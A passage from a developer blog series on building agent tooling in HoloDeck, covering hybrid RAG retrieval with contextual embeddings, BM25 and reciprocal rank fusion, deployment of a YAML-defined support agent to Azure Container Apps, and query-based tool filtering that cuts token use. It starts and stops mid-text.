                    ┌────────────────┴────────────────┐
                    │                                  │
                    ▼                                  ▼
          ┌─────────────────┐              ┌─────────────────┐
          │  Embed (dense)  │              │  Index (BM25)   │
          │  via model      │              │  keyword index  │
          └────────┬────────┘              └────────┬────────┘
                   │                                │
                   ▼                                ▼
          ┌─────────────────┐              ┌─────────────────┐
          │  Vector Index   │              │  BM25 Index     │
          │  (semantic)     │              │  (lexical)      │
          └─────────────────┘              └─────────────────┘


  QUERY PHASE
  ───────────

  User Query: "What are the reporting requirements?"
       │
       ├──────────────────────────────┐
       │                              │
       ▼                              ▼
  ┌──────────────┐           ┌──────────────┐
  │ Vector Search│           │ BM25 Search  │
  │ (semantic    │           │ (keyword     │
  │  similarity) │           │  matching)   │
  └──────┬───────┘           └──────┬───────┘
         │                          │
         │  rank_1, rank_2, ...     │  rank_1, rank_2, ...
         │                          │
         └────────────┬─────────────┘
                      │
                      ▼
         ┌────────────────────────┐
         │  Reciprocal Rank       │
         │  Fusion (RRF)          │
         │                        │
         │  score(d) = Σ 1/(k+r)  │
         │  where k=60, r=rank    │
         │                        │
         │  Merges both result    │
         │  sets into one ranked  │
         │  list                  │
         └───────────┬────────────┘
                     │
                     ▼
         ┌────────────────────────┐
         │  Reranker (optional)   │
         │  Re-scores top-N       │
         │  for final ordering    │
         └───────────┬────────────┘
                     │
                     ▼
         ┌────────────────────────┐
         │  Top-K chunks → LLM   │
         │  for generation        │
         └────────────────────────┘

This is the key thing most people miss: it's not just contextual embeddings. The real power comes from the hybrid approach — vector search catches the semantic intent ("reporting requirements") while BM25 catches the exact terms ("Section 403(b)"). RRF merges both ranked lists so you get the best of both worlds without having to tune a linear combination weight.

The Numbers

The results are anything but simple:

Technique	Failure Rate	Reduction
Baseline (naive RAG)	5.7%	—
+ Contextual Embeddings	3.7%	-35%
+ Contextual Embeddings + BM25 (RRF)	2.9%	-49%
+ All of the above + Reranking	1.9%	-67%

From 5.7% down to 1.9%. That's not a typo — a 67% reduction in retrieval failures just by preserving context and combining search modalities. And the cost? Roughly a dollar per million document tokens with prompt caching. In a world where a single hallucinated legal citation can cost a business real money, that's essentially free.

What struck me wasn't just the effectiveness — it was the simplicity. No graph construction. No elaborate multi-agent retrieval choreography. Just: understand your document's structure, preserve it through the chunking process, use both vector AND keyword search, and let the fusion algorithm sort it out.

From Insight to Implementation: The Hierarchical Document Tool

This blog post became the direct inspiration for a new tool I'm building in HoloDeck, my open-source agent experimentation platform. I call it the Hierarchical Document Tool , and it takes Anthropic's approach and pushes it further — specifically for the kind of deeply structured documents I deal with at work.

The problem I'm solving is legislative analysis. We're talking about statutes, regulations, and policy documents that are 800 to 1,000 pages long, with intricate hierarchical structure: Titles, Chapters, Sections, Subsections, Paragraphs, Subparagraphs. A single piece of analysis might span multiple such documents. Getting retrieval wrong isn't just annoying — it means an agent cites the wrong section of law, or misses a critical cross-reference.

Here's where the Hierarchical Document Tool goes beyond what Anthropic described:

Structure-aware chunking

Instead of blindly splitting on token count, the tool parses markdown (converted from any source format) and chunks along structural boundaries. Every chunk retains its full parent chain as metadata:

["Title I", "Chapter 2", "Section 203", "Subsection (a)", "Paragraph (1)"]

When a chunk is retrieved, you know exactly where it lives in the document hierarchy. No more "this chunk mentions a 30-day deadline but I have no idea which part of which law it came from."

Contextual embeddings via LLM

Following Anthropic's approach, each chunk is sent through a lightweight LLM call (Claude Haiku or anything with a large enough context window) that generates a 50–100 token context preamble from the full document and the chunk's structural location. A chunk like "The Administrator shall submit a report within 90 days" gets prepended with something like: "This chunk is from Section 203 of the Environmental Protection Act, Title IV, Chapter 2, which covers administrative reporting requirements for regulated entities."

The contextualized text — preamble plus original chunk — is what gets embedded and indexed. The whole context generation pipeline for a 100-page document costs roughly $0.03 with prompt caching, runs 10 chunks concurrently, and falls back gracefully to raw chunks if the LLM call fails. Three cents. For a hundred pages. I'll take that trade every time.

Hybrid search with tiered keyword strategy

This is where it gets fun. The tool maintains three parallel indices: dense (embedding) for semantic search, sparse (BM25) for keyword search, and exact match for precise lookups like section numbers (to be built).

What makes this interesting is the keyword search layer. Not every vector store supports native hybrid search, so the tool uses a tiered strategy:

Tier 1 — Native hybrid : If your provider supports it (Azure AI Search, Weaviate, Qdrant), use the built-in hybrid capabilities
Tier 2 — OpenSearch : Route to an OpenSearch endpoint for production-grade BM25
Tier 3 — In-memory BM25 : Fall back to an in-memory index for development and testing

All three search modalities run in parallel and merge via Reciprocal Rank Fusion (score(d) = sum of weight_i / (k + rank_i), with k=60 by default) with configurable weights.

And because RRF is rank-based, it doesn't require score normalization across different search engines. The best BM25 result gets a big boost even if its raw score is on a different scale than the embedding similarity. This means you can tune the weights to favor precision (keyword) or recall (semantic) without worrying about score calibration.

When someone searches for "Section 403(b)(2)", the exact match index catches it instantly. When they search for "What are the environmental reporting requirements?", the semantic index handles it. In practice, most queries benefit from all three.

Reranking: the final 18% that matters

Look at Anthropic's numbers again. Contextual embeddings + BM25 gets you from 5.7% to 2.9% — a 49% reduction. But adding a reranker on top pushes that to 1.9% — another 18 percentage points of improvement. That last mile matters a lot when you're working with legal text where "close enough" isn't.

Here's what reranking actually does: after RRF merges your vector and keyword results into a single ranked list, you take the top N candidates (say, 30) and pass them through a cross-encoder model that scores each candidate in the context of the original query. Unlike embedding similarity — which compares pre-computed vectors — a cross-encoder sees the query and the document chunk together, which lets it catch nuances that embedding distance misses.

The trade-off is latency. Cross-encoders are slower because they can't pre-compute anything — every query-document pair needs a forward pass. But we're talking about scoring 20–30 candidates, not your entire corpus. In practice, that's under 500ms, which is plenty fast for most use cases.

Reranking isn't in HoloDeck yet — it's next on the roadmap. But I've already designed it as an opt-in extension for vectorstore tools, and the plan supports two providers:

Cohere Rerank API — cloud-hosted, fast, no infrastructure to manage. Great for getting started
vLLM — self-hosted reranking models for teams with data privacy requirements or who want to run open-source cross-encoders. vLLM exposes a Cohere-compatible /v1/rerank endpoint, so the same client code works for both

The config will be dead simple. Add rerank: true to any vectorstore tool and you're done:

tools:
  - name: knowledge_search
    type: vectorstore
    config:
      index: product-docs
    rerank: true
    reranker:
      provider: cohere
      model: rerank-english-v3.0
      api_key: ${COHERE_API_KEY}

A few things I'm particularly happy with in the design so far:

Candidate pool sizing : By default, the reranker gets top_k * 3 candidates. If you're returning 10 results, the system fetches 30 from the initial search, reranks all 30, then returns the top 10. More candidates = better reranking quality, at the cost of slightly more latency. You can tune rerank_top_n directly if you want to dial this in
Graceful fallback : If the reranker fails (network timeout, rate limit, service down), the system silently falls back to the original ranked results and logs a warning. Your search doesn't break just because the reranker had a bad day. Configuration errors like bad API keys still fail fast though — you want to know about those immediately, not discover them at 2am
Zero breaking changes : Existing vectorstore configs without rerank: true work exactly as before. The whole thing is opt-in

Definition and cross-reference extraction

Legal and regulatory documents are riddled with defined terms ("Administrator means the Administrator of the Environmental Protection Agency") and cross-references ("as described in Section 201(a)(1)(b)"). If you've ever tried to read legislation, you know the pain — half the document is just pointing at other parts of the document.

The tool detects definitions sections and extracts them into a separate, always-available reference. Cross-references are identified and stored so agents can navigate related sections.

This is still evolving — planned improvements include explicit tools that let agents look up term definitions on demand and resolve section cross-references directly (more on this in the agentic shift section below).

The YAML

And because HoloDeck is a no-code agent platform, all of this is configured through YAML:

tools:
  - name: legislative_search
    type: hierarchical_document
    source: ./regulations
    contextual_embeddings: true
    context_model:
      provider: azure_openai
      name: gpt-5-mini # use a cheap, fast model but with a large context window
      temperature: 0.0
    context_max_tokens: 100
    context_concurrency: 10
    chunking_strategy: structure
    max_chunk_tokens: 800
    semantic_weight: 0.5
    keyword_weight: 0.3
    exact_weight: 0.2
    # rerank: true # coming soon
    # reranker:
    # provider: cohere
    # model: rerank-english-v3.0

One YAML block. Structure-aware chunking, contextual embeddings with a cheap LLM, triple-index hybrid search — and reranking once that lands. No Python required. I'm pretty happy with how this turned out.

Don't Forget Structured Data

While we're on the topic of retrieval, there's another blind spot in the "RAG everything" approach that nobody talks about: structured data.

Most enterprise RAG discussions focus exclusively on unstructured content — PDFs, Word docs, policy manuals. But organisations sit on mountains of structured data in CSVs, JSON feeds, databases, and APIs. An agent doing legislative analysis might need to cross-reference a regulation with a structured dataset of enforcement actions, compliance filings, or budget allocations.

Any serious RAG strategy needs to account for both:

Unstructured content → chunking-embedding-retrieval pipeline
Structured data → query interfaces (SQL, API calls, structured search)

Treating everything as "documents to embed" is how you end up with a chatbot that can vaguely summarise a spreadsheet but can't tell you the exact value in row 47. Don't be that team.

The Agentic Shift

Meanwhile, the landscape is shifting under our feet. Tools like Claude Code, OpenAI Codex, and others are introducing sophisticated agentic workflows where the AI doesn't just retrieve — it reasons about what to retrieve, how to retrieve it, and what to do with the results.

I wrote about this in a previous post, Agentic Memory: Bash + File System Is All You Need, exploring how advanced memory management for agents can be as simple as reading and writing files. The same principle applies to retrieval: the most effective systems aren't the ones with the most exotic retrieval algorithm. They're the ones where the agent has the right tools — lookup a definition, navigate to a section, search by keyword, search by concept — and the judgment to use them appropriately.

This is why I'm building the Hierarchical Document Tool as a toolkit, not a monolithic search endpoint. Today the tool exposes hybrid search with structure-aware results. But the roadmap includes giving agents explicit primitives:

A definition lookup tool so the agent can resolve defined terms on demand ("What does 'Administrator' mean in this Act?")
A section navigation tool that lets agents traverse the document hierarchy directly ("Go to Title 1, Chapter 3, Section 201(a)(1)(b)")

Instead of one big search call, the agent gets the building blocks to reason about information retrieval the way a human researcher would — look up a term, follow a cross-reference, search semantically, then search by keyword to confirm. That's the real unlock.

The Problem That Was Never Solved

Here's what I keep coming back to: information retrieval is a decades-old problem, and we haven't solved it. We've just been cycling through new implementations of the same fundamental challenge.

Before LLMs, we had TF-IDF, BM25, latent semantic analysis, learning-to-rank. These techniques powered search engines that actually worked, that billions of people relied on daily. Then the LLM wave hit, and somehow the industry collectively decided to replace all of that hard-won information retrieval knowledge with "just embed everything and do cosine similarity."

That was never going to be enough. Embeddings are powerful for capturing semantic similarity, but they're terrible at exact matching, structured lookups, and preserving document hierarchy. BM25 is excellent at keyword precision but misses conceptual relationships. The answer — as Anthropic demonstrated with the hybrid pipeline above — is to combine them thoughtfully. And to respect the structure of the documents you're working with.

The organisations I see struggling with RAG aren't struggling because the technology is bad. They're struggling because they skipped the boring parts: understanding their document structures, building proper indexing pipelines, implementing hybrid search, testing retrieval quality independently from generation quality. They jumped straight to the chatbot demo and wondered why it hallucinated.

RAG Isn't Dead. We Just Never Did It Right.

The hype cycle wants to move on. Context windows are growing. Some argue we'll eventually just stuff everything into the prompt. Maybe. But for the foreseeable future — for the 800-page statutes, the multi-document regulatory analyses, the enterprise knowledge bases with tens of thousands of documents — retrieval is still the bottleneck, and getting it right still matters enormously.

Anthropic's contextual retrieval technique isn't magic. It's just good engineering: understand what information is lost in your pipeline, and put it back. Combine vector and keyword search with RRF instead of betting everything on embeddings. Add a reranker if you can. The Hierarchical Document Tool I'm building takes that same philosophy and extends it to deeply structured documents where position in the hierarchy is meaning itself.

RAG had promise. It still does. But it's time we stopped treating information retrieval as a solved problem that just needs a vector database, and started treating it as the hard, nuanced, domain-specific engineering challenge it's always been.

The shiny new thing will always be tempting. But sometimes the biggest gains come from going back and doing the old thing properly.

This post is part of a series on building AI agent tooling. Read my previous post on Agentic Memory: Bash + File System Is All You Need for more on the patterns I'm implementing in HoloDeck.

From YAML to Production: Deploying HoloDeck Agents to Azure Container Apps

Jeremiah Justin Barias — Wed, 28 Jan 2026 00:00:00 +0000

From YAML to Production: Deploying HoloDeck Agents to Azure Container Apps

Your agent works locally. The evaluations pass. Chat sessions flow smoothly. Now comes the question every agent developer faces: how do I get this thing into production?

Traditionally, this is where the real work begins—Dockerfiles, container registries, Kubernetes manifests, ingress controllers, health checks. But with HoloDeck's new deploy command, you can go from a local YAML configuration to a production endpoint in a few commands. No Kubernetes required.

In this guide, we'll walk through deploying a customer support agent to Azure Container Apps.

The Customer Support Agent

Let's start with what we're deploying. The customer-support agent in sample/customer-support/ollama/ (from github.com/justinbarias/holodeck-samples) is a context-aware support chatbot with:

Knowledge base search via vector stores for product documentation
FAQ lookup for quick answers to common questions
Product catalog search for subscription plans and pricing
Conversation memory via MCP for context persistence

Here's the core configuration:

name: customer-support
description: Context-aware customer support agent with knowledge base integration

model:
  provider: ollama
  name: gpt-oss:20b
  temperature: 0.3
  max_tokens: 4096
  endpoint: http://truenas.home:11434

instructions:
  file: instructions/system-prompt.md

tools:
  # Knowledge Base - Product documentation and support articles
  - name: knowledge_base
    type: vectorstore
    description: Search product documentation and support articles
    database: chromadb
    embedding_model: nomic-embed-text:latest
    top_k: 5
    source: data/knowledge_base.md

  # FAQ Database - Frequently asked questions
  - name: faq
    type: vectorstore
    description: Search frequently asked questions for quick answers
    database: chromadb
    embedding_model: nomic-embed-text:latest
    source: data/faq.json
    top_k: 3

  # Memory - Conversation persistence via MCP
  - name: memory
    type: mcp
    description: Store and retrieve conversation context
    command: npx
    args:
      - "-y"
      - "@modelcontextprotocol/server-memory"

No Python code. Just YAML. The agent knows how to search documentation, look up FAQs, and remember conversation context—all defined declaratively.

Adding Deployment Configuration

To deploy this agent, we add a deployment section to agent.yaml. This tells HoloDeck where to push the container image and which cloud provider to use:

deployment:
  registry:
    url: ghcr.io
    repository: justinbarias/customer-support-agent
  target:
    provider: azure
    azure:
      subscription_id: <guid-of-subscription-id>
      resource_group: holodeck-aca
      environment_name: holodeck-env
      location: australiaeast
  protocol: rest
  port: 8080

Let's break this down:

Field	Description
`registry.url`	Container registry (GitHub Container Registry in this case)
`registry.repository`	Repository name for the image
`target.provider`	Cloud provider (`azure`, `aws`, or `gcp`)
`target.azure.*`	Azure-specific settings—subscription, resource group, environment
`protocol`	API protocol (`rest` or `ag-ui` for CopilotKit)
`port`	Port the agent listens on

Building the Container Image

With the deployment configuration in place, building the image is a single command:

holodeck deploy build agent.yaml

Here's what happens:

Loading agent configuration from agent.yaml...

Build Configuration:
  Agent: customer-support
  Image: ghcr.io/justinbarias/customer-support-agent:3443eda
  Platform: linux/amd64
  Protocol: rest
  Port: 8080

Preparing build context...
Connecting to Docker...
Building image ghcr.io/justinbarias/customer-support-agent:3443eda...

============================================================
  Build Successful!
============================================================

  Image: ghcr.io/justinbarias/customer-support-agent:3443eda
  ID: sha256:b7e145183148...

  Next steps:
    Run locally: docker run -p 8080:8080 ghcr.io/justinbarias/customer-support-agent:3443eda
    Push to registry: docker push ghcr.io/justinbarias/customer-support-agent:3443eda

Behind the scenes, HoloDeck:

Generates a Dockerfile using the holodeck-base image
Copies your agent files (agent.yaml, instructions, data directories)
Creates an entrypoint script that runs holodeck serve
Builds the image with OCI-compliant labels
Tags it with the current git SHA (3443eda)

Want to see what would be built without actually building? Use --dry-run:

holodeck deploy build agent.yaml --dry-run

This shows the generated Dockerfile and build context without executing anything.

Pushing to Registry

The holodeck deploy push command is planned but not yet implemented. For now, use Docker directly:

# Login to GitHub Container Registry
docker login ghcr.io -u USERNAME

# Push the image
docker push ghcr.io/justinbarias/customer-support-agent:3443eda


The push refers to repository [ghcr.io/justinbarias/customer-support-agent]
c57f153dc3b1: Pushed
cab5b36daf6a: Pushed
0190bcbc478d: Pushed
...
3443eda: digest: sha256:d807e905fed0... size: 4080

Deploying to Azure Container Apps

With the image in the registry, deployment is another single command:

holodeck deploy run agent.yaml


Deploy Configuration:
  Agent: customer-support
  Image: ghcr.io/justinbarias/customer-support-agent:3443eda
  Tag: 3443eda
  Platform: linux/amd64
  Provider: azure
  Port: 8080

Deployment Successful!
  Service: customer-support
  Status: Succeeded
  URL: https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io
  Health: https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io/health

HoloDeck creates an Azure Container App with:

External ingress with automatic HTTPS
Health checks on /health
Auto-scaling based on HTTP traffic
Environment variables for LLM API keys (passed through securely)

The agent is now live at the generated URL.

Testing the Deployed Agent

Let's verify the deployment with a health check:

curl https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io/health


{
  "status": "healthy",
  "agent_name": "customer-support",
  "agent_ready": true,
  "active_sessions": 0,
  "uptime_seconds": 14.41
}

The agent is healthy and ready to receive requests.

To chat with the agent:

curl -X POST https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io/chat \
  -H "Content-Type: application/json" \
  -d '{"message": "What is your return policy?"}'

Managing Deployments

Check Status

At any time, you can check the deployment status:

holodeck deploy status agent.yaml


Deployment Status
  Service: customer-support
  Provider: azure
  Status: Succeeded
  URL: https://customer-support.nicerock-800c6f60.australiaeast.azurecontainerapps.io
  Updated: 2026-01-28T00:27:28.537340+00:00

Tear Down

When you're done, clean up the deployment:

holodeck deploy destroy agent.yaml

This removes the Container App from Azure. The image remains in the registry for future deployments.

State Tracking

HoloDeck tracks deployment state locally in .holodeck/deployments.json. This allows it to manage updates and teardowns without querying the cloud provider each time.

What About AWS and GCP?

AWS App Runner and GCP Cloud Run support are coming soon. The configuration looks similar:

# AWS App Runner (planned)
deployment:
  target:
    provider: aws
    aws:
      region: us-east-1
      cpu: 1
      memory: 2048

# GCP Cloud Run (planned)
deployment:
  target:
    provider: gcp
    gcp:
      project_id: my-project
      region: us-central1
      memory: 512Mi

For now, you can use holodeck deploy build to create the container image, push it to any registry, and deploy manually to your preferred platform. See the DIY Deployment section in the deployment guide for details.

Conclusion

We went from a YAML configuration to a production API endpoint in four steps:

Add deployment config to agent.yaml
Build with holodeck deploy build
Push the image to a registry
Deploy with holodeck deploy run

No Dockerfiles to write. No Kubernetes to configure. No infrastructure to manage.

The full deployment documentation is available in the Deployment Guide. Give it a try with your own agents—and let us know how it goes.

How I Reduced My Agent's Token Consumption by 83%

Jeremiah Justin Barias — Fri, 16 Jan 2026 00:00:00 +0000

(Excuse the bad meme image prompt, I'm new at this LOL)

How I Reduced My Agent's Token Consumption by 83%

I was building a research agent with HoloDeck for paper search, Brave Search for web lookups, and a memory MCP server for knowledge graphs. Pretty standard stuff.

Then I looked at my API call payload for a simple "hi there" message:

{
  "messages": [...],
  "tools": [
    {"function": {"name": "vectorstore-search_papers", ...}},
    {"function": {"name": "brave_search-brave_image_search", ...}},
    {"function": {"name": "brave_search-brave_local_search", ...}},
    {"function": {"name": "brave_search-brave_news_search", ...}},
    {"function": {"name": "brave_search-brave_summarizer", ...}},
    {"function": {"name": "brave_search-brave_video_search", ...}},
    {"function": {"name": "brave_search-brave_web_search", ...}},
    {"function": {"name": "memory-add_observations", ...}},
    {"function": {"name": "memory-create_entities", ...}},
    {"function": {"name": "memory-create_relations", ...}},
    {"function": {"name": "memory-delete_entities", ...}},
    {"function": {"name": "memory-delete_observations", ...}},
    {"function": {"name": "memory-delete_relations", ...}},
    {"function": {"name": "memory-open_nodes", ...}},
    {"function": {"name": "memory-read_graph", ...}},
    {"function": {"name": "memory-search_nodes", ...}}
  ]
}

16 tools. For "hi there."

The Brave Search MCP server alone exposes 6 functions with verbose parameter schemas (country codes, language enums, pagination options). The memory server adds another 9. Every single request was burning tokens on tool definitions the model would never use.

The Anthropic Inspiration

Anthropic's engineering team published a fantastic post on advanced tool use that addressed exactly this problem. Their key insight: don't load all tools upfront—discover them on demand.

Their numbers were compelling: a five-server MCP setup went from ~55K tokens to ~8.7K tokens. An 85% reduction.

I wanted that for HoloDeck. But I'm using Microsoft's Semantic Kernel, not Claude's native tool system. So I had to figure out how to make it work.

The Architecture

Here's what I built:

User Query
    │
    ▼
┌─────────────────────────────┐
│     ToolFilterManager       │
│  ┌───────────────────────┐  │
│  │      ToolIndex        │  │
│  │  • Tool metadata      │  │
│  │  • Embeddings         │  │
│  │  • BM25 index         │  │
│  │  • Usage tracking     │  │
│  └───────────────────────┘  │
│             │               │
│      search(query)          │
│             │               │
│             ▼               │
│    Filtered tool list       │
└─────────────────────────────┘
    │
    ▼
┌─────────────────────────────┐
│  FunctionChoiceBehavior     │
│  .Auto(filters={            │
│    "included_functions":    │
│      ["tool1", "tool2"]     │
│  })                         │
└─────────────────────────────┘
    │
    ▼
Semantic Kernel Agent Invocation
(only selected tools in context)

Three main components:

ToolIndex - Indexes all tools from Semantic Kernel plugins with embeddings and BM25 stats
ToolFilterManager - Orchestrates filtering and integrates with SK's execution settings
FunctionChoiceBehavior - SK's native mechanism for restricting which functions the LLM sees

Building the Tool Index

The first challenge: extracting tool metadata from Semantic Kernel's plugin system. SK organizes tools as functions within plugins, so I needed to crawl that structure:

async def build_from_kernel(
    self,
    kernel: Kernel,
    embedding_service: EmbeddingGeneratorBase | None = None,
    defer_loading_map: dict[str, bool] | None = None,
) -> None:
    plugins: dict[str, KernelPlugin] = getattr(kernel, "plugins", {})

    for plugin_name, plugin in plugins.items():
        functions: dict[str, KernelFunction] = getattr(plugin, "functions", {})

        for func_name, func in functions.items():
            full_name = f"{plugin_name}-{func_name}"

            # Extract description and parameters for search
            description = getattr(func, "description", "")
            parameters: list[str] = []

            func_params: list[KernelParameterMetadata] | None = getattr(
                func, "parameters", None
            )
            if func_params:
                for param in func_params:
                    if param.description:
                        parameters.append(f"{param.name}: {param.description}")

            # Create searchable metadata
            tool_metadata = ToolMetadata(
                name=func_name,
                plugin_name=plugin_name,
                full_name=full_name,
                description=description,
                parameters=parameters,
                defer_loading=defer_loading_map.get(full_name, True),
            )

            self.tools[full_name] = tool_metadata

Each tool becomes a searchable document combining its name, plugin, description, and parameter info.

Three Search Methods

I implemented three ways to find relevant tools:

1. Semantic Search (Embeddings)

The obvious choice. Embed the query, embed the tools, compute cosine similarity:

async def _semantic_search(
    self, query: str, embedding_service: EmbeddingGeneratorBase | None
) -> list[tuple[ToolMetadata, float]]:
    # Generate query embedding
    query_embeddings = await embedding_service.generate_embeddings([query])
    query_embedding = list(query_embeddings[0])

    results: list[tuple[ToolMetadata, float]] = []
    for tool in self.tools.values():
        if tool.embedding:
            score = _cosine_similarity(query_embedding, tool.embedding)
            results.append((tool, score))

    return results

Good for understanding intent. "Find information about refunds" matches get_return_policy even though they share no keywords. Scores range from 0.0 to 1.0, with good matches typically in the 0.4-0.6 range.

2. BM25 (Keyword Matching)

Classic information retrieval using BM25 (Robertson & Zaragoza, 2009). Sometimes you want exact matches:

def _bm25_score_single(self, query: str, tool: ToolMetadata) -> float:
    query_tokens = _tokenize(query)
    doc_tokens = _tokenize(self._create_searchable_text(tool))

    # Count term frequencies
    term_freq: dict[str, int] = {}
    for token in doc_tokens:
        term_freq[token] = term_freq.get(token, 0) + 1

    score = 0.0
    for term in query_tokens:
        if term not in term_freq:
            continue

        tf = term_freq[term]
        idf = self._idf_cache.get(term, 0.0)

        # BM25 formula
        numerator = tf * (self._BM25_K1 + 1)
        denominator = tf + self._BM25_K1 * (
            1 - self._BM25_B + self._BM25_B * doc_length / self._avg_doc_length
        )
        score += idf * (numerator / denominator)

    return score

Fast, no embeddings needed. Great for technical terms: "brave_search" should definitely match tools from the Brave Search plugin.

Important gotcha: The tokenizer must split on underscores! Tool names like brave_web_search need to tokenize as ["brave", "web", "search"], not as a single token. Otherwise queries containing "web" won't match the tool. I learned this the hard way when "find papers on the web" was returning brave_image_search instead of brave_web_search.

def _tokenize(text: str) -> list[str]:
    # Use [a-zA-Z0-9]+ to split on underscores (not \w+ which includes them)
    tokens = re.findall(r"[a-zA-Z0-9]+", text.lower())
    return tokens

3. Hybrid (Reciprocal Rank Fusion)

Why choose? Combine both with Reciprocal Rank Fusion (Cormack et al., 2009):

async def _hybrid_search(
    self, query: str, embedding_service: EmbeddingGeneratorBase | None
) -> list[tuple[ToolMetadata, float]]:
    semantic_results = await self._semantic_search(query, embedding_service)
    bm25_results = self._bm25_search(query)

    # Reciprocal Rank Fusion
    k = 60 # Constant from the original paper
    rrf_scores: dict[str, float] = {}

    semantic_sorted = sorted(semantic_results, key=lambda x: x[1], reverse=True)
    for rank, (tool, _) in enumerate(semantic_sorted):
        rrf_scores[tool.full_name] = rrf_scores.get(tool.full_name, 0.0) + 1 / (k + rank + 1)

    bm25_sorted = sorted(bm25_results, key=lambda x: x[1], reverse=True)
    for rank, (tool, _) in enumerate(bm25_sorted):
        rrf_scores[tool.full_name] = rrf_scores.get(tool.full_name, 0.0) + 1 / (k + rank + 1)

    # Normalize to 0-1 range (raw RRF scores are ~0.01-0.03)
    max_score = max(rrf_scores.values()) if rrf_scores else 1.0
    normalized = {name: score / max_score for name, score in rrf_scores.items()}

    return [(self.tools[name], score) for name, score in normalized.items()]

RRF rewards tools that rank highly in both methods without being dominated by either's raw scores.

Critical detail: Raw RRF scores are tiny (0.01-0.03 range) because of the formula 1/(k+rank+1) with k=60. If you apply a similarity_threshold of 0.3 to raw scores, everything gets filtered out! You must normalize RRF scores to 0-1 range by dividing by the max score. After normalization, good matches score 0.8-1.0.

The Semantic Kernel Integration

Semantic Kernel has a FunctionChoiceBehavior class that controls which functions the LLM can call. It supports a filters parameter:

def create_function_choice_behavior(
    self, filtered_tools: list[str]
) -> FunctionChoiceBehavior:
    return FunctionChoiceBehavior.Auto(
        filters={"included_functions": filtered_tools}
    )

That's it. Pass in a list of tool names, and SK only sends those tool definitions to the LLM.

The manager wires it all together:

async def prepare_execution_settings(
    self,
    query: str,
    base_settings: PromptExecutionSettings,
) -> PromptExecutionSettings:
    if not self.config.enabled:
        return base_settings

    # Filter tools based on query
    filtered_tools = await self.filter_tools(query)

    # Create behavior with only filtered tools
    function_choice = self.create_function_choice_behavior(filtered_tools)

    # Clone settings and attach filtered behavior
    cloned = self._clone_settings(base_settings)
    cloned.function_choice_behavior = function_choice

    return cloned

Configuration

I made it all YAML-configurable because that's the HoloDeck way:

tool_filtering:
  enabled: true
  top_k: 5 # Max tools per request
  similarity_threshold: 0.5 # Minimum score for inclusion
  always_include:
    - search_papers # Critical tools always available
  always_include_top_n_used: 0 # Disable until usage patterns stabilize
  search_method: hybrid # Options: semantic, bm25, hybrid

Sensible Defaults

Here's what I recommend starting with:

Parameter	Default	Rationale
`top_k`	5	Enough tools for most tasks without token bloat
`similarity_threshold`	0.5	Include tools at least 50% as relevant as top result
`always_include`	[]	Agent-specific—add your critical tools here
`always_include_top_n_used`	0	Avoid early usage bias; enable after patterns stabilize
`search_method`	hybrid	Best of semantic + keyword matching

Threshold Tuning by Search Method

All search methods now return normalized scores in the 0-1 range, making the similarity_threshold consistent across methods:

Method	Good Match Range	Recommended Threshold
semantic	0.4 - 0.6	0.3 - 0.4
bm25 (normalized)	0.8 - 1.0	0.5 - 0.6
hybrid (normalized)	0.8 - 1.0	0.5 - 0.6

A threshold of 0.5 means "include tools scoring at least 50% of what the top result scores." This filters out clearly irrelevant tools while keeping useful ones.

Configuration Knobs

top_k : How many tools max per request
similarity_threshold : Below this score, tools get filtered out
always_include : Your core tools that should always be available
always_include_top_n_used : Adaptive optimization—frequently used tools stay in context. Caution: This tracks usage across requests, so early/accidental tool calls can bias future filtering. Keep at 0 during development.

Here's the full agent configuration I was testing with:

# HoloDeck Research Agent Configuration
name: "research-agent"
description: "Research analysis AI assistant"

model:
  provider: azure_openai
  name: gpt-5.2

instructions:
  file: instructions/system-prompt.md

# Tools Configuration
tools:
  # Vectorstore for research paper search
  - type: vectorstore
    name: search_papers
    description: Search research papers and documents for relevant passages
    source: data/papers_index.json
    embedding_model: text-embedding-3-small
    top_k: 5
    database:
      provider: chromadb

  # Brave Search MCP Server (exposes 6 functions)
  - type: mcp
    name: brave_search
    description: Web search using Brave Search API
    command: npx
    args: ["-y", "@brave/brave-search-mcp-server"]
    env:
      BRAVE_API_KEY: ${BRAVE_API_KEY}

  # Memory MCP Server (exposes 9 functions)
  - type: mcp
    name: memory
    description: Persistent memory using local knowledge graph
    command: npx
    args: ["-y", "@modelcontextprotocol/server-memory"]

# Tool Filtering - This is where the magic happens
tool_filtering:
  enabled: true
  top_k: 5
  similarity_threshold: 0.5
  always_include:
    - search_papers
  always_include_top_n_used: 0
  search_method: hybrid

Three tool sources. 16 total functions exposed. Without filtering, every request sends all 16 tool schemas.

The Results

Let me show you actual API payloads. With filtering off , here's what gets sent for a simple "hi there":

{
  "messages": [
    {"role": "system", "content": "# System Prompt for research-agent..."},
    {"role": "user", "content": "hi there"}
  ],
  "model": "gpt-5.2",
  "tools": [
    {"type": "function", "function": {"name": "vectorstore-search_papers", "description": "Search research papers...", "parameters": {...}}},
    {"type": "function", "function": {"name": "brave_search-brave_image_search", "description": "Performs an image search...", "parameters": {"properties": {"query": {...}, "country": {...}, "search_lang": {...}, "count": {...}, "safesearch": {...}, "spellcheck": {...}}, ...}}},
    {"type": "function", "function": {"name": "brave_search-brave_local_search", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_news_search", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_summarizer", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_video_search", ...}},
    {"type": "function", "function": {"name": "brave_search-brave_web_search", ...}},
    {"type": "function", "function": {"name": "memory-add_observations", ...}},
    {"type": "function", "function": {"name": "memory-create_entities", ...}},
    {"type": "function", "function": {"name": "memory-create_relations", ...}},
    {"type": "function", "function": {"name": "memory-delete_entities", ...}},
    {"type": "function", "function": {"name": "memory-delete_observations", ...}},
    {"type": "function", "function": {"name": "memory-delete_relations", ...}},
    {"type": "function", "function": {"name": "memory-open_nodes", ...}},
    {"type": "function", "function": {"name": "memory-read_graph", ...}},
    {"type": "function", "function": {"name": "memory-search_nodes", ...}}
  ]
}

16 tools. 5,888 tokens. For "hi there."

Look at those Brave Search parameter schemas—country code enums, language preferences, pagination options, safesearch filters. Each tool definition is a token hog.

With filtering on :

{
  "messages": [
    {"role": "system", "content": "# System Prompt for research-agent..."},
    {"role": "user", "content": "hi there"}
  ],
  "model": "gpt-5.2",
  "tools": [
    {"type": "function", "function": {"name": "vectorstore-search_papers", ...}},
